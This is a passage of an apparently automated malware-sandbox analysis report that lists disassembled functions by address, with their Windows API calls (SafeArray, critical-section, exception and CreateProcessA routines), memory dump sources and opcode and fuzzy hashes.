                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave_memset
                                                                      • String ID:
                                                                      • API String ID: 3751686142-0
                                                                      • Opcode ID: ec4216e69363d3946be2eb5216d48e47f6a520e4c35adfb6ace5776bda3f51cd
                                                                      • Instruction ID: bcc27e508f0a52d3590392b3addae0c29291687ae888ba70af126fa69414dced
                                                                      • Opcode Fuzzy Hash: ec4216e69363d3946be2eb5216d48e47f6a520e4c35adfb6ace5776bda3f51cd
                                                                      • Instruction Fuzzy Hash: 53516C74A04206AFCB04DF58C890F9AB7F6FF89304F10855DE91A8B391DB32E956CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0C3A90 Relevance: 4.6, APIs: 3, Instructions: 130COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6F0C3B71
                                                                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F0C3B83
                                                                      • SafeArrayDestroy.OLEAUT32(?), ref: 6F0C3BCF
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$Bound$Destroy
                                                                      • String ID:
                                                                      • API String ID: 3651546500-0
                                                                      • Opcode ID: f8acabcac49cd70ffe1be5556dea15189e246dd6dcf96c4318a0dfc17a6b1510
                                                                      • Instruction ID: 061067322c13e6f79f49d2ed64fb745a5ffc0294a2deb57d7280f11f37972522
                                                                      • Opcode Fuzzy Hash: f8acabcac49cd70ffe1be5556dea15189e246dd6dcf96c4318a0dfc17a6b1510
                                                                      • Instruction Fuzzy Hash: F8418971208A01DFD701CF58C881E9EF7E9FFC8254F244A1EF99497290D671E9858B92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0C69C0 Relevance: 4.6, APIs: 3, Instructions: 128COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6F0C6A08
                                                                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F0C6A15
                                                                      • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F0C6A41
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$Bound$Element
                                                                      • String ID:
                                                                      • API String ID: 3836540358-0
                                                                      • Opcode ID: 8ae6a50603836d54e76ff50e8a68761f31cde647aa3177198dd9ecc2cf41e022
                                                                      • Instruction ID: 57f626a7ea05481b0695d991c36e4bad61e6cb0556d8b9006b1eff09572f3e2c
                                                                      • Opcode Fuzzy Hash: 8ae6a50603836d54e76ff50e8a68761f31cde647aa3177198dd9ecc2cf41e022
                                                                      • Instruction Fuzzy Hash: 5A413B75600619AFDB10DFA8C880FEFB7B8EF4A350F108659E9159B290D731E951CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0BDFB0 Relevance: 4.6, APIs: 3, Instructions: 120COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SafeArrayGetLBound.OLEAUT32(?,00000001,00000000), ref: 6F0BDFF6
                                                                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6F0BE003
                                                                      • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6F0BE02F
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$Bound$Element
                                                                      • String ID:
                                                                      • API String ID: 3836540358-0
                                                                      • Opcode ID: 31d95435e7f135a6a97f85f3b0ffcfaa20ce8171960c2a37dd90a905aaaa7dc5
                                                                      • Instruction ID: 6aa56463d95410fa3d30400c98f86dc0ca3fd023fd850b3971c2d656852b673f
                                                                      • Opcode Fuzzy Hash: 31d95435e7f135a6a97f85f3b0ffcfaa20ce8171960c2a37dd90a905aaaa7dc5
                                                                      • Instruction Fuzzy Hash: 8841EE75A10619DFCB14DFA8CCC4AAEB7B5FB49310B1046ADE525E7390D732A941CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0BD920 Relevance: 4.6, APIs: 3, Instructions: 81COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SafeArrayCreateVector.OLEAUT32(0000000D,00000000,00000002), ref: 6F0BD949
                                                                      • SafeArrayPutElement.OLEAUT32(00000000,?,00000000), ref: 6F0BD96C
                                                                      • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F0BD9CF
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$CreateDestroyElementVector
                                                                      • String ID:
                                                                      • API String ID: 3149346722-0
                                                                      • Opcode ID: 169eeba0a87cdd9bc5f36e56da754b359d413f62fb9c2a61c4a32ef4f7bea28c
                                                                      • Instruction ID: 58838d06fbf642048eb0bc28572f52a2ede3f10766f6b2ff4b855415ffc967e5
                                                                      • Opcode Fuzzy Hash: 169eeba0a87cdd9bc5f36e56da754b359d413f62fb9c2a61c4a32ef4f7bea28c
                                                                      • Instruction Fuzzy Hash: 50219035601616AFEB11CF94C884FABB7E9EF8A750F1040A9ED44DB244D772E901CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0CDB10 Relevance: 4.6, APIs: 3, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F0CDB2D
                                                                      • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6F0CDB45
                                                                      • SafeArrayDestroy.OLEAUT32(00000000), ref: 6F0CDBA2
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$CreateDestroyElementVector
                                                                      • String ID:
                                                                      • API String ID: 3149346722-0
                                                                      • Opcode ID: 68614c6763cbf580450a31ae46b33264ba6efaba0a6c865a1b2fd73c6e21b961
                                                                      • Instruction ID: 9f5fef43cd38db173651beac2150b190fee2f45e75b8c0363ed2eaac0e929b30
                                                                      • Opcode Fuzzy Hash: 68614c6763cbf580450a31ae46b33264ba6efaba0a6c865a1b2fd73c6e21b961
                                                                      • Instruction Fuzzy Hash: 28119D75682205EFD700DF69C888F9ABBB8FF5A311F0481A9E918DB341D730A851CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0B6C60 Relevance: 4.5, APIs: 3, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 6F0B6C73
                                                                      • SafeArrayAccessData.OLEAUT32(00000000,6F0B6C3C), ref: 6F0B6C87
                                                                      • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6F0B6CA3
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$Data$AccessCreateUnaccessVector
                                                                      • String ID:
                                                                      • API String ID: 3963895280-0
                                                                      • Opcode ID: e01dd60b54d8fe3efc6119252e93cfcfa6ce28d0dcd6ad8f281a52e2094762e4
                                                                      • Instruction ID: 9536381d41c1da9b218f2be0b6f989262428055d2779fea7317f0df70389f426
                                                                      • Opcode Fuzzy Hash: e01dd60b54d8fe3efc6119252e93cfcfa6ce28d0dcd6ad8f281a52e2094762e4
                                                                      • Instruction Fuzzy Hash: 78F05E76200218BBEB106F91DC89F973BACFF867A0F008015FA188A245EA71E5508BA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0D3EB0 Relevance: 3.2, APIs: 2, Instructions: 242COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 6F109BB5: _malloc.LIBCMT ref: 6F109BCF
                                                                      • std::exception::exception.LIBCMT ref: 6F0D4042
                                                                        • Part of subcall function 6F109533: std::exception::_Copy_str.LIBCMT ref: 6F10954E
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0D4059
                                                                        • Part of subcall function 6F10AC75: RaiseException.KERNEL32(?,?,6F109C34,F3D820D6,?,?,?,?,6F109C34,F3D820D6,6F139C90,6F14B974,F3D820D6), ref: 6F10ACB7
                                                                        • Part of subcall function 6F109BB5: std::exception::exception.LIBCMT ref: 6F109C04
                                                                        • Part of subcall function 6F109BB5: std::exception::exception.LIBCMT ref: 6F109C1E
                                                                        • Part of subcall function 6F109BB5: __CxxThrowException@8.LIBCMT ref: 6F109C2F
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: std::exception::exception$Exception@8Throw$Copy_strExceptionRaise_mallocstd::exception::_
                                                                      • String ID:
                                                                      • API String ID: 2813683038-0
                                                                      • Opcode ID: f932e7a7a9b0f27adac6d3597592497aa0b9fd6ec4217f81239dbe4c305910c9
                                                                      • Instruction ID: d67b4d8817556b4c8e6ed71a0e133a3977c4b8fdf4abde24369239c81e502318
                                                                      • Opcode Fuzzy Hash: f932e7a7a9b0f27adac6d3597592497aa0b9fd6ec4217f81239dbe4c305910c9
                                                                      • Instruction Fuzzy Hash: C4919EB19043049FD710DF99D881B9AFBF8FF85390F54895EF4149B290E7B1A5048F92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0B62C0 Relevance: 3.1, APIs: 2, Instructions: 149COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 6F109BB5: _malloc.LIBCMT ref: 6F109BCF
                                                                      • std::exception::exception.LIBCMT ref: 6F0B6466
                                                                        • Part of subcall function 6F109533: std::exception::_Copy_str.LIBCMT ref: 6F10954E
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0B647D
                                                                        • Part of subcall function 6F10AC75: RaiseException.KERNEL32(?,?,6F109C34,F3D820D6,?,?,?,?,6F109C34,F3D820D6,6F139C90,6F14B974,F3D820D6), ref: 6F10ACB7
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                      • String ID:
                                                                      • API String ID: 2299493649-0
                                                                      • Opcode ID: b1f6c573dee1bc35e80fc26743e3f977a4e54592babc5c16dfe7b6e414be052b
                                                                      • Instruction ID: b1165483cd2913475d9f8e0dc6ce8d789ab30d8eb629ca5363fa0b9242bc772d
                                                                      • Opcode Fuzzy Hash: b1f6c573dee1bc35e80fc26743e3f977a4e54592babc5c16dfe7b6e414be052b
                                                                      • Instruction Fuzzy Hash: 42519BB28083409FD310DF58C991B4ABBE4FB85790F80496EF9898B390D772E904CB93
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0CD2E0 Relevance: 3.1, APIs: 2, Instructions: 109COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 6F109BB5: _malloc.LIBCMT ref: 6F109BCF
                                                                      • std::exception::exception.LIBCMT ref: 6F0CD3E8
                                                                      • __CxxThrowException@8.LIBCMT ref: 6F0CD3FF
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                      • String ID:
                                                                      • API String ID: 4063778783-0
                                                                      • Opcode ID: 3d8b51f728e3183ac50aa7e0808c191a521d01781ca0d5beccafbabc1381ce86
                                                                      • Instruction ID: 6024d3fa556cfef97fa5f7cb60c149e17e474adbb4700692906a815ad6fe0a3c
                                                                      • Opcode Fuzzy Hash: 3d8b51f728e3183ac50aa7e0808c191a521d01781ca0d5beccafbabc1381ce86
                                                                      • Instruction Fuzzy Hash: 723159715097059FC704DF28C88099EBBF5BF89364F508A2EF8558B390E731E916CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0B8D60 Relevance: 2.6, APIs: 2, Instructions: 78COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EnterCriticalSection.KERNEL32(?,?,00000000,6F0B8C13,?,6F0B8CD3,?,6F0B8C13,00000000,?,?,6F0B8C13,?,?), ref: 6F0B8D73
                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,6F0B8CD3,?,6F0B8C13,00000000,?,?,6F0B8C13,?,?), ref: 6F0B8D8C
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave
                                                                      • String ID:
                                                                      • API String ID: 3168844106-0
                                                                      • Opcode ID: 6fe861b768f96347fae396562ed4e7ca5182cf1c0e0513fe4f79b13f8c77fa09
                                                                      • Instruction ID: 6136a5a458adfd089c55c4061af72564afbb1e757ce9ae28174664690475ac46
                                                                      • Opcode Fuzzy Hash: 6fe861b768f96347fae396562ed4e7ca5182cf1c0e0513fe4f79b13f8c77fa09
                                                                      • Instruction Fuzzy Hash: DB21E67520450AAF8B04DF89D890DAAB3FAFFC9210B108549E91687351CB71EE16CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0B8BC0 Relevance: 2.6, APIs: 2, Instructions: 52COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,6F0B6890,?), ref: 6F0B8BDD
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6F0B8C23
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave
                                                                      • String ID:
                                                                      • API String ID: 3168844106-0
                                                                      • Opcode ID: 02c52584ec8b2f636aea367a1f596d1ff92ed4dc558e3e4b0bd16798fbb7c57e
                                                                      • Instruction ID: a5e60f96ade049147893b5e62725edc3bfba8e02e58d83c95c067ef76c62bc98
                                                                      • Opcode Fuzzy Hash: 02c52584ec8b2f636aea367a1f596d1ff92ed4dc558e3e4b0bd16798fbb7c57e
                                                                      • Instruction Fuzzy Hash: 8901BCB1304505AFC740DFA8D884E9AF3E8FF882107104269E905C7301DB32EDA1CBD5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 061C5FD8 Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 061C62A7
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049603049.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_61c0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: cde56e4792f43e7d32ddd0b15c88b56b8b2dd9e32a648df9b57d69fb448093d2
                                                                      • Instruction ID: 6c7ffcec8f3e59ed64322157ed6ca7e51081f99501d0eb5dc48e89780849a3a7
                                                                      • Opcode Fuzzy Hash: cde56e4792f43e7d32ddd0b15c88b56b8b2dd9e32a648df9b57d69fb448093d2
                                                                      • Instruction Fuzzy Hash: 55C12370D002198FDF64CFA8CC91BEEBBB1BB59310F0095A9E859B7240DB749A85CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 061C5FE0 Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 061C62A7
